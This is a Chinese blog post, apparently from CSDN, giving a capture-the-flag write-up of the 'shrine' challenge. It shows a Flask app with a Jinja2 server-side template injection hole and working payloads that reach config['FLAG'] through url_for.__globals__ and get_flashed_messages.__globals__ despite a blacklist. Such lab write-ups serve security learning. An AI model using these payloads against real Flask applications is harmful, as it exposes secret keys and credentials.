攻防世界shrine

最新推荐文章于 2024-07-22 17:09:56 发布
最新推荐文章于 2024-07-22 17:09:56 发布
阅读量27 收藏
点赞数
文章标签: flask python 后端 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45955869/article/details/130956431
版权

提示:本人24小时在线,如有疑问,可联系我!

文章目录

前言

攻防世界shrine

题目?

还是mantra浏览器好用啊!
在这里插入图片描述
解读一下。

import flask
import os

app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
    return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        #会注释为空!
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
    return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
    app.run(debug=True)

ssti

./tplmap.py -u ‘http://61.147.171.105:57127/’
发现tplmap不太行。

同时,他将config和self当成了黑名单 而flag在config文件里
如果没有黑名单的时候,我们可以传入 config,或者传入{{self.dict}}获取,但当这些被过滤的时候,我们需要借助一些全局变量利用沙盒逃逸的方法,来调用被禁用的函数对象。

config 和 self 无法使用。如果这道题没有过滤config 和 self 的话,可以执行:{{config.FLAG}} 和 {{self.dict}}

利用url_for函数查看全局变量字典,发现了Flask:/shrine/{{url_for.globals}}
在这里插入图片描述

{{url_for.globals[‘current_app’].config}}

在这里插入图片描述

其他

{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

/shrine/{{url_for.__globals__['current_app'].config}}

总结

在Flask中,有一些特殊的变量和方法是可以在模板文件中直接访问的。

qq_45955869
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全 | CTF】攻防世界 shrine 解题详析
等风来
07-24 3859
进入环境:格式化代码:这段代码创建了一个 Flask 应用对象,并设置了一个名为 FLAG 的配置项,其值来自环境变量。然后定义了两个路由,一个用于返回当前文件的内容,另一个用于渲染 Jinja2 模板。推测flag在名为FLAG的config中,但黑名单过滤了config,通过Jinja2联想SSTI注入在这个程序中,/shrine/ 是定义的路由路径,会匹配到处理该路径的函数。于是构造路径:回显如下:说明SSTI可行在 Flask 中,url_for 函数是定义在 Flask 的全局命名空间中的
攻防世界 shrine -wp
freerats的博客
07-12 303
打开网址就是一堆代码 右击查看源代码方面看些 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): de
攻防世界 shrine 详解
xmj818719的博客
03-29 1864
打开题目 整理源码 代码审计: 目标 config['FLAG'] 过滤了 config,self 这两个函数的过滤没看懂,总之好像也没过滤掉(应该是过滤了后面的变量),圆括号是彻底的被过滤掉了,URL编码都没用(刚开始想测试XSS来着) 做完后,拿编译器跑了一下带config的payload也没发现过滤 回归正题 2个@app.route 为路由 第一个是 / 使用URL/ 可访问index()也就是刚刚开始显示的源码 第二个...
攻防世界
handuoduo123的博客
12-05 949
攻防世界 新手题 misc 前5道 不得不说,这道题真的是入门级别了。答案就在题目中,复制粘贴就好 flag{th1s_!s_a_d4m0_4la9} 下载完题目是一张动态图隐约可以看到有个缺少定位符的二维码 隐约可以看到有个缺少定位符的二维码 利用PS把二维码补全(随意扣一张二维码的定位符就好了) 工具扫描得到flag{e7d478cf6b915f50ab1277f78502a2c5} 下载...
shrine-commerce
04-04
"shrine-commerce" 是一个基于 Flutter 和 Dart 技术构建的电子商务项目,旨在提供一个用于学习和实践 MDC-100 系列代码实验室的平台。在这个项目中,你可以深入理解如何用 Flutter 构建现代化的购物应用,同时熟悉 ...
shrine-webdav:提供用于Shrine的简单WebDAV存储
05-11
gem 'shrine-webdav' 用法 假设您具有报告模型,该模型应该能够将数据存储在远程WebDAV存储中。 class Report < ApplicationRecord end # == Schema Information # # Table name: reports # # id :uuid not ...
Shrine View-crx插件
04-07
谷歌地图以其强大的地理信息系统闻名,能够提供高清的卫星图片,让用户仿佛置身于高空俯瞰世界各地。"Shrine View-crx"利用这一特性,从超过5000个不同的日本神社中随机选取一个展示,让每一次的新标签页打开都充满...
shrine.cr:适用于Crystal应用程序的文件附件工具包。 受神殿Ruby启发
02-05
Shrine.cr是一个专门为Crystal编程语言设计的文件附件处理库,灵感来源于Ruby社区中的 Shrine 框架。这个库提供了一套全面的解决方案,用于在Crystal应用程序中上传、存储和管理文件,同时也支持多种ORM适配器,使得...
基于Material Design 2实现的Shrine-MaterialDesign2..zip
09-24
【标题】基于Material Design 2实现的Shrine-MaterialDesign2项目详解 【描述】Material Design 2,也称为Material Design Lite,是Google推出的一种设计语言的升级版,旨在为应用和网站提供更加统一、现代且富有...
Azure MySQL资源优化策略
联蔚盘云的博客
07-19 482
综上所述,Azure MySQL资源的优化策略涉及选择合适的服务器类型、优化服务器配置、使用预留实例、监控与性能调优、自动缩放、优化网络配置、使用连接池、分区与分片、备份与恢复以及利用Azure Advisor等多个方面。灵活服务器提供了更好的成本优化控制和可突发计算层,适用于不需要连续完整计算能力的工作负荷。针对Azure MySQL资源的优化策略,可以从多个方面入手,以提升数据库的性能、稳定性和成本效益。通过购买Azure MySQL的预留实例,可以获得显著的价格折扣,同时不影响资源的运行状态。
GraphRAG的实践
m0_57057282的博客
07-19 323
好久没有体验新技术了,今天来玩一下GraphRAG顾名思义,一种检索增强的方法,利用图谱来实现RAG。
使用 Flask 3 搭建问答平台(二):User 模型搭建
Flag少侠的博客
07-17 5225
以下所有代码均是在之前的基础上添加!!!后面的章节均是如此。
【接口自动化_12课_基于Flask搭建MockServer】
weixin_42333261的博客
07-18 602
知识非核心点,面试题较少。框架搭建的过程中的细节才是面试要点第三方接口,不方便进行测试,自己要一个接口去进行模拟。去作为我们项目访问模拟接口。自己写一个接口,需要怎样写。
使用 Flask 3 搭建问答平台(一):项目结构搭建
Flag少侠的博客
07-17 4444
【代码】使用 Flask 3 搭建问答平台(一):项目结构搭建。
基于gunicorn+flask+docker模型 高并发部署
Chujun123528的博客
07-19 1062
基于Gunicorn+Flask+Docker模型的高并发部署是一种现代且高效的微服务架构部署方式,它结合了Flask作为Web框架的简洁性、Gunicorn作为WSGI HTTP服务器的性能优势,以及Docker容器化技术的一致性和可移植性。以下将详细阐述该模型的高并发部署过程,包括环境设置、代码实现、Docker镜像构建及部署等方面。
Flask: URL 视图函数 路由
SZ170110231的博客
07-22 244
Flask: URL 视图函数 路由
使用 Flask 3 搭建问答平台(三):注册页面模板渲染
Flag少侠的博客
07-18 4528
前端文件下载链接。
Flask 框架 redirect() url_for()
最新发布
SZ170110231的博客
07-22 289
Flask 框架中,redirect(), url_for()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值